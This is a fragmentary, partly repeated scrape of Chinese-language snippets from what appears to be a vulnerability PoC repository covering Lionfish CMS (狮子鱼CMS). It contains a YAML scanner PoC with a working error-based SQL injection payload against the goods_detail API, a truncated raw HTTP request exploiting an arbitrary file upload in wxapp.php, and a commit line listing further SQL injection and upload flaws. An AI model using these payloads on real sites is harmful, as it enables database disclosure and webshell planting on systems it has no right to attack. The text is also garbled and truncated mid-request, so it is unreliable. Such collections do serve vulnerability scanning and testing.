name: poc-yaml-狮子鱼CMS-sql description: "sql注入" method: GET path: - /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) expression: status: 200 body_any: - "localhost" - "XPATH syntax error" - "系统发生错误" 471 changes: 236 additions ...
"/seller.php?s=/Public/login" 利用poc: POST/wxapp.php?controller=Goods.doPageUploadHTTP/1.1Host:xxx.xxx.xxx.xxxContent-Length:214Cache-Control:max-age=0Upgrade-Insecure-Requests:1Origin:nullContent-Type:multipart/form-data;boundary=---WebKitFormBoundary8UaANmWAgM4BqBSsUser-Agent:Mozilla/5.0(Wind...
PeiQi提交于4年前.更新狮子鱼 泛微OA 等多个漏洞:data: 狮子鱼CMS 狮子鱼CMS wxapp.php 任意文件上传漏洞 狮子鱼CMS image_upload.php 任意文件上传 狮子鱼CMS ApigoodController.class.php SQL注入漏洞 狮子鱼CMS ApiController.class.php SQL注入漏洞 ...
name: poc-yaml-狮子鱼CMS-sql description: "sql注入" method: GET path: - /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) expression: status: 200 body_any: - "localhost" - "XPATH syntax error" - "系统发生错误" 471 changes: 236 additions ...